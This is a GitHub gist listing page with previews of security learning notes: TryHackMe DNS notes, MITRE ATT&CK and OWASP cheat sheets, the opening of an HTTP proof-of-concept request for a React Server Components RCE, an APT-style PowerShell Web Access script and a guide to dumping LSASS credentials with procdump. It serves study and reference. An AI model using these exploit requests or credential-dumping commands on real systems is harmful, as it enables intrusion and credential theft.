Skip to content

Instantly share code, notes, and snippets.

View Adkali's full-sized avatar
🎯
Focusing

Adkali Adkali

🎯
Focusing
26 followers · 6 following
View GitHub Profile
@Adkali
Adkali / CVE-2025-55182.http
Created December 9, 2025 18:45 — forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@Adkali
Adkali / TryHackMe {Adkali} [Web Fundamentals \ How The Web Works ].md
Last active April 16, 2025 13:47
This repository serves as a personal knowledge base to document my progress on the TryHackMe platform. Each entry contains structured notes, findings, and key takeaways from rooms or modules I’ve completed. Note: Every gist will begin with the following format: TryHackMe {Adkali} - [ Module Name ]

DNS in details

What is DNS?

The Domain Name System (DNS) helps us humans communicate with devices across the internet more easily. As people, we often have trouble remembering complex information like long strings of numbers. That's where DNS becomes useful.

Think of DNS like the internet’s phonebook. Instead of having to remember a computer’s unique number (called an IP address), we can use simple names like google.com.

Every device connected to the internet has its own unique IP address, similar to a home address that tells information where to go. An IP address usually looks like this: 10.0.2.14. It consists of four sets of numbers separated by periods.

Rather than memorizing those numbers, DNS allows us to use easy-to-remember names. It translates those names into IP addresses behind the scenes. It’s like saving someone’s name in your contacts instead of trying to remember their phone number.

@Adkali
Adkali / TTP's Notes.md
Last active December 16, 2024 16:37
TTPS Notes & CheatSheet

TTPS: Tactics, Techniques, and Procedures

Techniques represent 'how' an adversary achieves a tactical goal by performing an action. For example, an adversary may dump credentials to achieve credential access. Tactics represent the "why" of an ATT&CK technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action. For example, an adversary may want to achieve credential access. https://attack.mitre.org/

1. Gaining Access to a Network (Initial Access)

  • Examples:
  1. An adversary sends phishing emails with malicious attachments to compromise user credentials and gain a foothold in the network.
@Adkali
Adkali / OwaspTop10CheatSheet.md
Last active November 16, 2024 21:20
OWASP Top 10 in a quick format: Save for self-learning, refreshing, and as a good-nice-reminder.

OWASP Top 10 - 2021

The OWASP Top 10 is a standard awareness document for developers and web application security professionals. It represents a consensus on the most critical security risks to web applications, compiled by the Open Web Application Security Project (OWASP). This guide provides detailed insights into each vulnerability, real-world examples, mitigation strategies, commands, and scenarios to help you strengthen your application's security posture.

Table of Contents

@Adkali
Adkali / PSWA.md
Created November 5, 2024 16:31 — forked from MHaggis/PSWA.md

Enable PowerShell Web Access like an APT

Ref: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a

PowerShell:

# PrivCheck
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Warning "Please run this script as an Administrator!"
    Exit
@Adkali
Adkali / Lsass.md
Created October 25, 2024 16:15
Methods to dump LSASS

Methods to Dump LSASS

Craft a comprehensive guide detailing various methods for dumping the LSASS.
I think This will be a valuable one and will make people stay updated on new techniques.

1. Procdump:

Procdump is a part of Microsoft Sysinternals and a command-line
utility programs for producing dumps of any running process
We can leverage it and use it fo DUMP lsass process by the following:
procdump.exe -ma lsass.exe C:\path\lsass.dmp

2. Mimikatz:

Mimikatz can both dump the LSASS process and read from an LSASS dump: